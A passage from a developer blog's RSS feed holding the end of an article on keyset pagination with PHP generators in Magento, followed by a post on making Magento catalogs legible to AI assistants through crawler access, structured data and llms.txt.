&lt;p&gt;This is where &lt;code&gt;yield&lt;/code&gt; helps. A PHP generator lets a function behave like an iterator — it hands back one batch at a time, pauses, and continues on the next call. Each batch can be freed from memory before the next one is fetched.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="n"&gt;getProductGenerator&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nv"&gt;$storeId&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt; &lt;span class="kt"&gt;Generator&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nv"&gt;$lastId&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nv"&gt;$rows&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$this&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;connection&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;fetchAll&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="nv"&gt;$this&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;buildProductSelect&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$storeId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$lastId&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;);&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;empty&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$rows&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="nv"&gt;$lastId&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;int&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="nb"&gt;end&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$rows&lt;/span&gt;&lt;span class="p"&gt;)[&lt;/span&gt;&lt;span class="s1"&gt;'entity_id'&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;

        &lt;span class="k"&gt;yield&lt;/span&gt; &lt;span class="nv"&gt;$rows&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;count&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$rows&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;1000&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The caller reads it like any other iterable:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="k"&gt;foreach&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$this&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;getProductGenerator&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$storeId&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="nv"&gt;$batch&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;foreach&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$batch&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="nv"&gt;$row&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="c1"&gt;// process one product&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="c1"&gt;// $batch can be freed from memory here&lt;/span&gt;
    &lt;span class="c1"&gt;// before the next batch is fetched&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Memory per batch stays small — around 5–10 MB for 1,000 rows in my case. The database runs constant-cost range scans. The caller does not need to know how many products exist.&lt;/p&gt;

&lt;h2&gt;
  
  
  One honest caveat
&lt;/h2&gt;

&lt;p&gt;A generator keeps &lt;strong&gt;per-batch&lt;/strong&gt; memory bounded. But if you collect results into a string or a big array across batches, &lt;strong&gt;total&lt;/strong&gt; memory through the full loop still grows with catalog size — only the peak per fetch stays small.&lt;/p&gt;

&lt;p&gt;So the full picture:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Database side:&lt;/strong&gt; truly constant cost per page, no matter the page depth&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Per-batch PHP memory:&lt;/strong&gt; small and bounded&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Total memory through the full loop:&lt;/strong&gt; still grows with catalog size, unless you also stream the output to disk&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The first two are big wins on their own. Do not overstate the third.&lt;/p&gt;

&lt;h2&gt;
  
  
  When to actually use this
&lt;/h2&gt;

&lt;p&gt;Keyset pagination is the right default for any loop that:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Reads a large table from start to finish.&lt;/strong&gt; Catalog exports, data sync jobs, sitemap generation, search reindexing — anywhere the caller needs every row, not a slice.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Runs in a background job, cron, or CLI.&lt;/strong&gt; The sequential nature of cursor pagination is fine when nothing downstream needs to jump to an arbitrary page.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Uses a primary key that is a number and always goes up.&lt;/strong&gt; Magento's &lt;code&gt;entity_id&lt;/code&gt; works this way — every new product gets a bigger ID than the last one, so &lt;code&gt;WHERE entity_id &amp;gt; :lastId&lt;/code&gt; always moves forward without skipping or repeating rows.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;It is &lt;em&gt;not&lt;/em&gt; the right tool when:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;You need to jump to an arbitrary page.&lt;/strong&gt; Keyset pagination is sequential — to load page 50 you need the cursor value from page 49. There is no way to compute "the row just after position 49,000" without walking there first. Storefront product listings where a user clicks "page 27" directly still need OFFSET.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The sort column is not the primary key.&lt;/strong&gt; If users sort by price or name, duplicate values exist (two products at €9.99), so the cursor needs a deterministic tie-breaker. The &lt;code&gt;WHERE&lt;/code&gt; clause becomes a pair: &lt;code&gt;WHERE (price, entity_id) &amp;gt; (:lastPrice, :lastId)&lt;/code&gt;. It works and it is still fast, but the SQL is longer and the index needs to cover both columns in the right order.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The table is small.&lt;/strong&gt; Under a few thousand rows, OFFSET cost is lost in the noise. Stick with the default collection — extra complexity is not worth it.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  The one-line version
&lt;/h2&gt;

&lt;p&gt;Use &lt;code&gt;WHERE pk &amp;gt; :lastId ORDER BY pk ASC LIMIT n&lt;/code&gt; instead of &lt;code&gt;OFFSET&lt;/code&gt;, and &lt;code&gt;yield&lt;/code&gt; your batches from a generator function. Your catalog loops will stop slowing down as the catalog grows.&lt;/p&gt;

&lt;p&gt;Source for the module that uses this technique: &lt;a href="https://github.com/iamrobindhiman/magento2-module-llms-txt" rel="noopener noreferrer"&gt;github.com/iamrobindhiman/magento2-module-llms-txt&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Further reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://www.php.net/manual/en/language.generators.overview.php" rel="noopener noreferrer"&gt;PHP: Generators overview&lt;/a&gt; — the official PHP docs on &lt;code&gt;yield&lt;/code&gt; and generator functions&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://use-the-index-luke.com/no-offset" rel="noopener noreferrer"&gt;We need tool support for keyset pagination&lt;/a&gt; by Markus Winand — the canonical argument against OFFSET, with SQL examples&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dev.mysql.com/doc/refman/8.0/en/limit-optimization.html" rel="noopener noreferrer"&gt;MySQL: Optimizing LIMIT queries&lt;/a&gt; — how MySQL handles LIMIT and OFFSET internally&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>magento2</category>
      <category>php</category>
      <category>performance</category>
    </item>
    <item>
      <title>Is your Magento store legible to AI assistants?</title>
      <dc:creator>Robin Dhiman</dc:creator>
      <pubDate>Sun, 14 Jun 2026 12:54:08 +0000</pubDate>
      <link>https://dev.to/iamrobindhiman/is-your-magento-store-legible-to-ai-assistants-3f3m</link>
      <guid>https://dev.to/iamrobindhiman/is-your-magento-store-legible-to-ai-assistants-3f3m</guid>
      <description>&lt;p&gt;Ask ChatGPT or Claude for "a waterproof hiking watch with a barometer under 200" and you don't get ten blue links. You get a shortlist, with reasons. For a growing slice of shoppers, that shortlist &lt;em&gt;is&lt;/em&gt; the storefront. They never reach a category page. Which raises an uncomfortable question for anyone running a catalog: when an assistant builds that list, is your store on it?&lt;/p&gt;

&lt;p&gt;On Shopify, answering that is increasingly the platform's job. Shopify now ships an Agentic Storefronts page in the admin that feeds your catalog into AI channels like ChatGPT and Copilot, then reports which queries you surface for. You can argue about how well it works, but it's native: a toggle. On Magento there is no toggle. If you want a Magento store to be legible to an AI assistant, that's on you to build.&lt;/p&gt;

&lt;p&gt;I spent the last few months building exactly that: a module that exposes a Magento catalog to AI crawlers and assistants. The work sorts cleanly into four layers. None of them are exotic. Most stores are missing all four.&lt;/p&gt;

&lt;h2&gt;
  
  
  Layer 1: Let the crawlers in, deliberately
&lt;/h2&gt;

&lt;p&gt;AI assistants are fed two ways: live retrieval at question time, and index crawls ahead of time. Both arrive as bots with their own user agents: GPTBot (OpenAI), ClaudeBot (Anthropic), Google-Extended, PerplexityBot, and a growing list.&lt;/p&gt;

&lt;p&gt;Magento doesn't ship an opinion about any of them. Your &lt;code&gt;robots.txt&lt;/code&gt; was written for Googlebot in a world that no longer exists. Step one is a decision, not code: which assistants are you willing to be read by, and have you actually said so? The mistake I see most is stores that block everything non-Google by reflex, then wonder why they're absent from AI answers.&lt;/p&gt;

&lt;h2&gt;
  
  
  Layer 2: Give them machine-readable facts
&lt;/h2&gt;

&lt;p&gt;A human reads "Was 180, now 140." A model inferring price, currency, and availability from rendered HTML gets it wrong often enough to drop you from a comparison.&lt;/p&gt;

&lt;p&gt;This is where &lt;code&gt;schema.org&lt;/code&gt; Product structured data earns its keep: JSON-LD with &lt;code&gt;price&lt;/code&gt;, &lt;code&gt;priceCurrency&lt;/code&gt;, &lt;code&gt;availability&lt;/code&gt;, &lt;code&gt;gtin&lt;/code&gt;, &lt;code&gt;brand&lt;/code&gt;. Magento emits &lt;em&gt;some&lt;/em&gt; structured data, but coverage is partial and theme-dependent. Hyvä, Luma, and every custom frontend handle it differently. The fix is unglamorous: audit what your product pages actually output as JSON-LD, and fill the gaps. Structured data was an SEO nicety for a decade. For machine readers it's the difference between a fact and a guess.&lt;/p&gt;

&lt;h2&gt;
  
  
  Layer 3: Publish a map: llms.txt
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://llmstxt.org/" rel="noopener noreferrer"&gt;llms.txt&lt;/a&gt; is a proposed convention: a single Markdown file at your domain root that tells an assistant, in plain prose, what lives here and where the canonical version is. Think of it as a &lt;code&gt;robots.txt&lt;/code&gt; written for comprehension instead of permission.&lt;/p&gt;

&lt;p&gt;I'm deliberately measured about this one. Adoption is early, no assistant &lt;em&gt;guarantees&lt;/em&gt; it reads your file, and anyone selling it as a ranking trick is overselling. But the cost is low and the logic is sound: when a model chooses what to retrieve, a clean Markdown summary of your catalog is far cheaper to parse than crawling a few thousand JavaScript-heavy product pages. You're doing the model's summarising for it, in your own words.&lt;/p&gt;

&lt;h2&gt;
  
  
  Layer 4: Scale (and why Magento makes it hard)
&lt;/h2&gt;

&lt;p&gt;Here it stops being a checklist and becomes engineering. A real catalog is 20k, 70k, 200k products. You can't dump all of it into one file, and you can't generate it by walking the catalog with naive &lt;code&gt;setCurPage()&lt;/code&gt; pagination. That approach quietly falls off a performance cliff at depth. Generating an llms.txt or a machine feed for a large Magento store means keyset iteration, real curation (your best sellers and category structure, not every SKU), and incremental regeneration so you're not rebuilding everything on each cron tick.&lt;/p&gt;

&lt;p&gt;That's the real reason this layer is missing from most stores: layers 1–3 are configuration, but layer 4 is a module someone has to write and keep correct as the catalog moves.&lt;/p&gt;

&lt;h2&gt;
  
  
  The honest summary
&lt;/h2&gt;

&lt;p&gt;This is early. The standards aren't settled, the assistants change behaviour monthly, and nobody can promise you a number. So don't treat AI discoverability as a growth hack; treat it as cheap table stakes you can get ahead of.&lt;/p&gt;

&lt;p&gt;The platforms are already drawing the line. Shopify is making catalog-to-AI a built-in feature. Magento, true to form, hands you the primitives and a clean architecture and expects you to assemble the rest. That's annoying. It's also the opening. The Magento stores legible to assistants in 2026 won't be the ones that waited for a toggle. They'll be the ones whose team treated it as four small problems and shipped them.&lt;/p&gt;

</description>
      <category>magento2</category>
      <category>ai</category>
      <category>ecommerce</category>
      <category>seo</category>
    </item>
  </channel>
</rss>
